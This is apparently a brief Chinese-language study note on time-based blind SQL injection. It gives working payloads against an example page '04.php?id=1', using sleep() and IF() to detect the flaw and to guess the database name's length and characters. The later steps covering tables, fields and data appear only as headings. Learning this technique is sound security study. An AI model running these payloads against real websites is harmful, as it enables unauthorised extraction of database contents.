- 判断是否存在漏洞
在and 1=1和and 1=2不起作用的情况下,使用sleep()辅助判断
04.php?id=1 and sleep(5)
浏览器出现缓冲时说明生效,但是也可能因为网络原因导致的缓冲
IF(expr1,expr2,expr3)
如果 expr1 是TRUE (expr1 <> 0 and expr1 <> NULL),则 IF()的返回值为expr2; 否则返回值则为 expr3。IF() 的返回值为数字值或字符串值,具体情况视其所在语境而定。
2.一一猜解数据库名长度
04.php?id=1 and if((length(database()))>6,sleep(5),1)
3.猜当前数据库第一个字母的ASCII值
04.php?id=1 and if(ascii(substr(database(),1,1))>114,sleep(5),1)
下面步骤与布尔盲注步骤相同,只需把语法稍作更改就行
用手工注入太费时,需配合工具使用,如kali、脚本,此为命令演示
4.猜出当前数据库的表名的第一个字母的ASCII值
5.猜出所选表下的所有字段
6.猜出所选字段下的数据